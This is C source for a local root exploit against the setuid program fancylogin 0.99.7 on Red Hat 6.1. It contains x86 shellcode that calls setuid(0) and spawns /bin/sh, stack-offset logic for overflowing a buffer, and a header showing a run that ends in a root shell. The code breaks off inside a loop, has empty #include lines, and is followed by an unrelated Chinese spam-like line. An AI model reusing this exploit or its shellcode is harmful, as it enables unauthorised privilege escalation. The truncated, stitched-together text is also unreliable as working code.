/* * (fancylogin 0.99.7) (suid) local root exploit. * Author: icesk of hhp. :: Greets to ttl. * www.hhp-programming.net / icesk@hhp-programming.net * Tested on redhat 6.1. * * bash$ ./hhp-fancy_smash.c * esp: bffffcc8 offset: -740 return: bfffffb4 align: 0 * This is fancylogin 0.99.7 * . * bash# exit */ #include #include #include char shellcode[] = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" "\xeb\x1f\x5e\x89\x76\x08\x31\xc0" "\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c" "\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; #define bsize 700 #define offset -710 char buffer[bsize * 6]; char *get_sp() { asm("movl %esp,%eax"); } main(int n, char **v) { int i, off, align; align = 0; if(n > 1) { off = atoi(v[1]); align = atoi(v[2]); } else { off = offset; align = 0; } printf("esp: %0x offset: %d return: %0x align: %d\n", get_sp(), off, get_sp() - off, align); for(i=0;i

亚洲欧美在线